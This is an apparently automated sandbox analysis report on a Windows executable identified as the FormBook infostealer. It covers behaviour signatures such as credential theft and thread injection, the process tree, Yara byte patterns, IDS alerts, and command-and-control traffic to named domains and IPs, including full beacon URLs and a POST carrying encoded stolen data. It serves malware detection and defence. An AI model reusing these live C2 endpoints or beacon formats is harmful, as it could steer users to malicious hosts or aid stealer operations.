Windows Analysis Report
CCE 30411252024.exe

Overview

General Information

Sample name: CCE 30411252024.exe
Analysis ID: 1566620
MD5: ace5b81f6392ca5ce9a2e0953e6d6e4e
SHA1: bb0a075a44d599c7976703e186e1a70f891f9163
SHA256: 74c3f1d43d2fbd0eeab386cb0086150568cef240d65b2efd0061721d6a0514ed
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • CCE 30411252024.exe (PID: 3892 cmdline: "C:\Users\user\Desktop\CCE 30411252024.exe" MD5: ACE5B81F6392CA5CE9A2E0953E6D6E4E)
    • svchost.exe (PID: 1880 cmdline: "C:\Users\user\Desktop\CCE 30411252024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UIOYLdBBxOZnTzrp.exe (PID: 876 cmdline: "C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 4632 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • UIOYLdBBxOZnTzrp.exe (PID: 6392 cmdline: "C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps
Source | Rule | Description | Author | Strings
0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x3d839:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x26ed8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 further entries not expanded in this report extract)

Yara matches in unpacked PE files
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ParentImage: C:\Users\user\Desktop\CCE 30411252024.exe, ParentProcessId: 3892, ParentProcessName: CCE 30411252024.exe, ProcessCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ProcessId: 1880, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ParentImage: C:\Users\user\Desktop\CCE 30411252024.exe, ParentProcessId: 3892, ParentProcessName: CCE 30411252024.exe, ProcessCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ProcessId: 1880, ProcessName: svchost.exe
Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T14:31:14.937130+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49794 | 154.215.72.110 | 80 | TCP
2024-12-02T14:31:48.840215+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49874 | 116.50.37.244 | 80 | TCP
2024-12-02T14:33:12.635919+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49928 | 85.159.66.93 | 80 | TCP
2024-12-02T14:33:27.520840+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50023 | 91.195.240.94 | 80 | TCP
2024-12-02T14:33:50.947332+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50027 | 66.29.149.46 | 80 | TCP
2024-12-02T14:34:06.414054+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50033 | 195.110.124.133 | 80 | TCP
2024-12-02T14:34:38.079364+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50038 | 217.196.55.202 | 80 | TCP

AV Detection

Source: http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF; Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=; Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=; Avira URL Cloud: Label: malware
Source: CCE 30411252024.exe; ReversingLabs: Detection: 73%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: CCE 30411252024.exe; Joe Sandbox ML: detected
Source: CCE 30411252024.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2243558952.000000000006E000.00000002.00000001.01000000.00000004.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000000.2398470881.000000000006E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F26CA9
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F260DD
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F263F9
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2EB60
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2F5FA
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F2F56F FindFirstFileW,FindClose,0_2_00F2F56F
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31B2F
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31C8A
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F31F94
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 6_2_0053BAB0 FindFirstFileW,FindNextFileW,FindClose,6_2_0053BAB0
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then xor eax, eax 6_2_00529480
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then pop edi 6_2_0052DD45
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then mov ebx, 00000004h 6_2_00D8053E

Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49794 -> 154.215.72.110:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49874 -> 116.50.37.244:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50027 -> 66.29.149.46:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49928 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50033 -> 195.110.124.133:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50023 -> 91.195.240.94:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 217.196.55.202:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View; IP Address: 91.195.240.94
Source: Joe Sandbox View; IP Address: 154.215.72.110
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 identical entries)
Source: C:\Users\user\Desktop\CCE 30411252024.exe; Code function: 0_2_00F34EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F34EB5
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.3xfootball.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.goldenjade-travel.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.magmadokum.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.rssnewscast.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?U6YDsxW=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&cPm=bL-XkPyPkF HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.techchains.info
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.elettrosistemista.zip
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.empowermedeco.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic; DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic; DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic; DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic; DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic; DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic; DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic; DNS traffic detected: DNS query: www.techchains.info
Source: global traffic; DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic; DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic; DNS traffic detected: DNS query: www.660danm.top
Source: global traffic; DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic; DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic; DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: unknown; HTTP traffic detected:
  POST /fo8o/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Accept-Encoding: gzip, deflate, br
  Host: www.goldenjade-travel.com
  Origin: http://www.goldenjade-travel.com
  Cache-Control: no-cache
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 212
  Referer: http://www.goldenjade-travel.com/fo8o/
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
  Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64
  Data Ascii: U6YDsxW=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Mon, 02 Dec 2024 13:31:14 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: close
